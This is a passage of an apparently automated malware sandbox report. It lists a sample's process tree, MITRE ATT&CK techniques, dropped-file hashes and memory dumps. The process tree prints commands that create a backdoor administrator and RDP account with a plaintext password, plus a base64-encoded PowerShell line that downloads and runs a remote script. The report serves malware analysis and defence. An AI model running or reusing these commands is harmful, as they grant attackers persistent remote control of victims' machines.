PID:1756
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc YgLu3sSl /add
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2932
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc YgLu3sSl /add
    3⤵
    PID:4828

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
1⤵
- Suspicious use of WriteProcessMemory
PID:1308
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
  2⤵
  PID:1592
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
    3⤵
    PID:1944

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" JKRSODLE$ /ADD
1⤵
PID:3312
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" JKRSODLE$ /ADD
  2⤵
  PID:4476
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" JKRSODLE$ /ADD
    3⤵
    PID:3544

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
1⤵
PID:4472
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
  2⤵
  PID:2968
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
    3⤵
    PID:1696

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc YgLu3sSl
1⤵
PID:4380
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc YgLu3sSl
  2⤵
  PID:4460
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc YgLu3sSl
    3⤵
    PID:2392

C:\Windows\System32\cmd.exe
cmd.exe /C wmic path win32_VideoController get name
1⤵
PID:3788
- C:\Windows\System32\Wbem\WMIC.exe
  wmic path win32_VideoController get name
  2⤵
  - Detects videocard installed
  - Suspicious use of AdjustPrivilegeToken
  PID:4556

C:\Windows\System32\cmd.exe
cmd.exe /C wmic CPU get NAME
1⤵
PID:1932
- C:\Windows\System32\Wbem\WMIC.exe
  wmic CPU get NAME
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4240

C:\Windows\System32\cmd.exe
cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
1⤵
PID:3668
- C:\Windows\system32\cmd.exe
  cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
  2⤵
  PID:1756
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
    3⤵
    - Blocklisted process makes network request
    - Drops file in Program Files directory
    - Drops file in Windows directory
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:372

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

File and Directory Permissions Modification

T1222

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Remote Services

T1021

Remote Desktop Protocol

T1021.001

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES4FF5.tmp

Filesize
1KB

MD5
da2f03503b1b90e7614e7327d18180f2

SHA1
9bad5aede6cd26f72abae610999cfd48b6dcbc09

SHA256
df2313137420bba6da99af33050e91b76e57390d1fe4c406d5454786bc7cc2e4

SHA512
ce7d29ca0653b2ab668c4870e019fd540d405223814dbac0fefe84a7c47afae5573f8e88d6b00574ce4130a309c70d644e9e63379e1f2bbcb679d5d5752efb46

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4osigmi2.gab.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\i5mt20ft\i5mt20ft.dll

Filesize
3KB

MD5
5b1b0d3cb13b4253a5baf26909dd2bc8

SHA1
ef725ac1f7301003e22b0dc319e7c6b1cee27a35

SHA256
ed14c5fa61776404a45cc011b493a46f4add77f6f4eb3df506d900f294f3f016

SHA512
8eea62a67e114527d91c0fc1a5ccd58b103a3333ea1c11e62c2592b6d1fbab19d4cdd942d7a3dcc288beae31437466b00a6283bf4e2e9c560db7d87d65ac6a86

Download Submit
C:\Users\Admin\AppData\Local\Temp\ready.ps1

Filesize
1KB

MD5
3447df88de7128bdc34942334b2fab98

SHA1
519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb

SHA256
9520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9

SHA512
2ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f

Download Submit
C:\Users\Admin\AppData\Local\Temp\resolve-domain.PS1

Filesize
2.5MB

MD5
c16f184d9d62eddb657c4a000477bed7

SHA1
5cae0c725cec08ec9bc5a2b246f55401329641f6

SHA256
eb5ed128539eeb68644aa0546eb88a8ee6c35e9bb0627dff4d59f6ac9b114528

SHA512
c8e8c2151a2fef875ce447dd857fdafcfd172d2f1ad5fe6d72caeed173efc1a64c296b50b98c61dec8b61f5ae05ca1b9e742fa19b851deee476537d55b089628

Download Submit
C:\Windows\Branding\mediasrv.png

Filesize
60KB

MD5
596ca1d187937a1a2bca34d8c8993f1f

SHA1
bb3dfb10cb06dddc4e58d8b3f5a08b8908378820

SHA256
7fce3b42b061497b14f16421ddafd75d3a56be2ebd081f2bd84157b0166803b7

SHA512
bde56fd03c38274033a8195ba1aba3645cb03821ba18db7b35f6a9062ee20f8df29e9e108a3f887c8bee4b5487ace1bd2e374ef9418aac4460a31437ba075df0

Download Submit
C:\Windows\Branding\mediasvc.png

Filesize
743KB

MD5
537f4dfd0535f687393b715b914c04a9

SHA1
852d52cf10f677e2abe2ecedd7693d9a9bf20e02

SHA256
ccf72f75efe3153a55507d1e73f0f366d380d1923ee912e2e0fee825367a56bc

SHA512
ccf483927c1a05b0af093d86c6f0f802ee0d199f8862cdf25667114a30ecb0c64ef55e96d2744b7149d8a444ea0001d78189862095942d38801e27045804141c

Download Submit
C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGI84A1.tmp

Filesize
24KB

MD5
d0e162c0bd0629323ebb1ed88df890d6

SHA1
cf3fd2652cdb6ff86d1df215977454390ed4d7bc

SHA256
3e6520cd56070637daa5c3d596e57e6b5e3bd1a25a08804ccea1ce4f50358744

SHA512
a9c82f1116fce7052d1c45984e87b8f3b9f9afeb16be558fd1ecbd54327350344f37f32bc5d4baabd3e1cf3ac0de75c8ba569c1e34aaf1094cd04641d137c117

Download Submit
C:\Windows\system32\rfxvmt.dll

Filesize
40KB

MD5
dc39d23e4c0e681fad7a3e1342a2843c

SHA1
58fd7d50c2dca464a128f5e0435d6f0515e62073

SHA256
6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9

SHA512
5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7

Download Submit
\??\PIPE\lsarpc

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\i5mt20ft\CSCAC647BD194504B51A4914C92D4E219AE.TMP

Filesize
652B

MD5
1de987c43938e0ce97754008b448dadd

SHA1
d2348ff6a6f7ea531a9f7acc74df4a41fc7b0172

SHA256
e33d57175056bc2ccfc2c498410c4e1d7faea117e407fba7f533bf2ed62cca94

SHA512
000f374a2cb67e20f04abba88c0d7201ea581f0722f57350d9c398e3ee530dcbfc4b5b884634ff407c590f16c5ed7c900935ebfebb7bfd5cf5038365c9a0105f

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\i5mt20ft\i5mt20ft.0.cs

Filesize
424B

MD5
4864fc038c0b4d61f508d402317c6e9a

SHA1
72171db3eea76ecff3f7f173b0de0d277b0fede7

SHA256
0f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84

SHA512
9e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\i5mt20ft\i5mt20ft.cmdline

Filesize
369B

MD5
7823062339cb44eeef2153938c6ba608

SHA1
b1b50a5c3099551fc026ebd1ef4ec7a733c2ba0a

SHA256
276ab9a6ff0fb309d80780b6ac62a731d9b05f3406831f8b19439efd531ea186

SHA512
cfd8a2b96a86d9729ac4baf4e9407ed4d8b3f22ca4ad755b1ba2b4d4545b415743eca193b492b5a1414ea0ab5199bc93e1aea5be2b35cd80e088137aa50f9893

Download Submit
memory/372-121-0x0000027137130000-0x0000027137140000-memory.dmp

Filesize
64KB

Download
memory/372-120-0x00007FFF41CC0000-0x00007FFF42781000-memory.dmp

Filesize
10.8MB

Download
memory/372-161-0x00007FFF41CC0000-0x00007FFF42781000-memory.dmp

Filesize
10.8MB

Download
memory/372-122-0x0000027137130000-0x0000027137140000-memory.dmp

Filesize
64KB

Download
memory/372-158-0x0000027137130000-0x0000027137140000-memory.dmp

Filesize
64KB

Download
memory/1156-83-0x00007FFF41CC0000-0x00007FFF42781000-memory.dmp

Filesize
10.8MB

Download
memory/1156-73-0x0000027DB48F0000-0x0000027DB4900000-memory.dmp

Filesize
64KB

Download
memory/1156-72-0x00007FFF41CC0000-0x00007FFF42781000-memory.dmp

Filesize
10.8MB

Download
memory/1868-56-0x0000026372ED0000-0x0000026372EE0000-memory.dmp

Filesize
64KB

Download
memory/1868-58-0x00007FFF41CC0000-0x00007FFF42781000-memory.dmp

Filesize
10.8MB

Download
memory/1868-57-0x0000026372ED0000-0x0000026372EE0000-memory.dmp

Filesize
64KB

Download
memory/1868-55-0x00007FFF41CC0000-0x00007FFF42781000-memory.dmp

Filesize
10.8MB

Download
memory/2036-125-0x000001D0D1690000-0x000001D0D16A0000-memory.dmp

Filesize
64KB

Download
memory/2036-18-0x000001D0D1810000-0x000001D0D1832000-memory.dmp

Filesize
136KB

Download
memory/2036-44-0x000001D0D1E40000-0x000001D0D1FB6000-memory.dmp

Filesize
1.5MB

Download
memory/2036-27-0x000001D0D1690000-0x000001D0D16A0000-memory.dmp

Filesize
64KB

Download
memory/2036-124-0x000001D0D1690000-0x000001D0D16A0000-memory.dmp

Filesize
64KB

Download
memory/2036-43-0x000001D0D1690000-0x000001D0D16A0000-memory.dmp

Filesize
64KB

Download
memory/2036-156-0x000001D0D1690000-0x000001D0D16A0000-memory.dmp

Filesize
64KB

Download
memory/2036-19-0x00007FFF41CC0000-0x00007FFF42781000-memory.dmp

Filesize
10.8MB

Download
memory/2036-40-0x000001D0D1680000-0x000001D0D1688000-memory.dmp

Filesize
32KB

Download
memory/2036-45-0x000001D0D21D0000-0x000001D0D23DA000-memory.dmp

Filesize
2.0MB

Download
memory/2036-123-0x000001D0D1690000-0x000001D0D16A0000-memory.dmp

Filesize
64KB

Download
memory/2036-85-0x00007FFF50E20000-0x00007FFF50E39000-memory.dmp

Filesize
100KB

Download
memory/2036-21-0x000001D0D1690000-0x000001D0D16A0000-memory.dmp

Filesize
64KB

Download
memory/2036-164-0x00007FFF50E20000-0x00007FFF50E39000-memory.dmp

Filesize
100KB

Download
memory/2036-165-0x00007FFF41CC0000-0x00007FFF42781000-memory.dmp

Filesize
10.8MB

Download
memory/2036-25-0x000001D0D1690000-0x000001D0D16A0000-memory.dmp

Filesize
64KB

Download
memory/2036-119-0x00007FFF41CC0000-0x00007FFF42781000-memory.dmp

Filesize
10.8MB

Download
memory/3028-105-0x0000021069820000-0x0000021069830000-memory.dmp

Filesize
64KB

Download
memory/3028-7-0x0000021069820000-0x0000021069830000-memory.dmp

Filesize
64KB

Download
memory/3028-109-0x0000021069820000-0x0000021069830000-memory.dmp

Filesize
64KB

Download
memory/3028-0-0x0000000000C10000-0x0000000001AA4000-memory.dmp

Filesize
14.6MB

Download
memory/3028-104-0x0000021069820000-0x0000021069830000-memory.dmp

Filesize
64KB

Download
memory/3028-84-0x00007FFF41CC0000-0x00007FFF42781000-memory.dmp

Filesize
10.8MB

Download
memory/3028-167-0x00007FFF41CC0000-0x00007FFF42781000-memory.dmp

Filesize
10.8MB

Download
memory/3028-5-0x0000021069C60000-0x000002106A086000-memory.dmp

Filesize
4.1MB

Download
memory/3028-6-0x00007FFF41CC0000-0x00007FFF42781000-memory.dmp

Filesize
10.8MB

Download
memory/3028-103-0x0000021069820000-0x0000021069830000-memory.dmp

Filesize
64KB

Download
memory/3028-10-0x0000021069820000-0x0000021069830000-memory.dmp

Filesize
64KB

Download
memory/3028-9-0x0000021069820000-0x0000021069830000-memory.dmp

Filesize
64KB

Download
memory/3028-8-0x0000021069820000-0x0000021069830000-memory.dmp

Filesize
64KB

Download
memory/3636-64-0x00007FFF41CC0000-0x00007FFF42781000-memory.dmp

Filesize
10.8MB

Download
memory/3636-66-0x000001C03B0C0000-0x000001C03B0D0000-memory.dmp

Filesize
64KB

Download
memory/3636-65-0x000001C03B0C0000-0x000001C03B0D0000-memory.dmp

Filesize
64KB

Download
memory/3636-71-0x00007FFF41CC0000-0x00007FFF42781000-memory.dmp

Filesize
10.8MB

Download